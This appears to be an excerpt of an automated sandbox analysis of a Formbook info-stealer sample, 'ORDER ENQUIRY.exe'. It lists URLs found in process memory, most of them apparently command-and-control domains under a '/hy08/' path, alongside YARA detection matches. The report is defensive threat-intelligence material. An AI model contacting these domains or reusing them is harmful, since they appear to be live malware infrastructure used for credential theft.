          Source: explorer.exe, 00000004.00000000.2114025669.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000004.00000002.4555698304.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555746089.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.4555114227.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.21556934.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.21556934.com/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.21556934.com/hy08/www.valo.games
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.21556934.comReferer:
          Source: explorer.exe, 00000004.00000003.3100426782.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117735583.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4562642663.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avai66.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avai66.xyz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avai66.xyz/hy08/www.cheaplaptops.biz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.avai66.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodgion.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodgion.xyz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodgion.xyz/hy08/www.avai66.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bodgion.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.btcrenaissance.net
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.btcrenaissance.net/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.btcrenaissance.net/hy08/www.yc23w.top
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.btcrenaissance.netReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cheaplaptops.biz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cheaplaptops.biz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cheaplaptops.biz/hy08/www.btcrenaissance.net
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cheaplaptops.bizReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cttlca.click
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cttlca.click/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cttlca.click/hy08/www.flywatchsecurity.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cttlca.clickReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flywatchsecurity.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flywatchsecurity.com/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flywatchsecurity.com/hy08/www.21556934.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flywatchsecurity.comReferer:
          Source: ORDER ENQUIRY.exeString found in binary or memory: http://www.google.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemcksqa.net
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemcksqa.net/hy08/
          Source: explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemcksqa.net/hy08/A
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemcksqa.net/hy08/j
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hemcksqa.netReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.horxncnt.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.horxncnt.xyz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.horxncnt.xyz/hy08/www.cttlca.click
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.horxncnt.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.manhuafeifei.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.manhuafeifei.xyz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.manhuafeifei.xyz/hy08/www.horxncnt.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.manhuafeifei.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mksport-app.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mksport-app.com/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mksport-app.com/hy08/www.raidsa.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mksport-app.comReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.os9user.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.os9user.com/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.os9user.com/hy08/www.mksport-app.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.os9user.comReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raidsa.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raidsa.xyz/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raidsa.xyz/hy08/www.manhuafeifei.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.raidsa.xyzReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.valo.games
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.valo.games/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.valo.games/hy08/www.bodgion.xyz
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.valo.gamesReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wergol.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wergol.com/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wergol.com/hy08/www.os9user.com
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wergol.comReferer:
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yc23w.top
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yc23w.top/hy08/
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yc23w.top/hy08/www.hemcksqa.net
          Source: explorer.exe, 00000004.00000003.3100358362.000000000353D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.0000000003540000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100405627.0000000003544000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yc23w.topReferer:
          Source: explorer.exe, 00000004.00000002.4560565201.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2117240871.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000004.00000000.2111653112.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000004.00000002.4556219779.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000004.00000000.2111653112.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4553917152.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000004.00000000.2100807606.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4552398722.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3880999579.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3096442622.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000004.00000002.4557463098.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3100493467.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009BA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://flywatchsecurity.com/hy08?GxlX=KVcwHz5T5zR/xh5veJhw4peaZs963mOOXmZZz4i4ompoXg80SoxOBoRtYZYOL
          Source: explorer.exe, 00000004.00000003.3100033957.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3095675812.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4557514681.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2114025669.0000000009B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000004.00000000.2117240871.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4560565201.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000004.00000000.2114025669.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4556219779.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
          Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: explorer.exe, 00000004.00000002.4565253332.00000000114CF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4552234596.000000000529F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2155700092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550866851.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550620909.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4550807070.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2098261483.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.ORDER ENQUIRY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
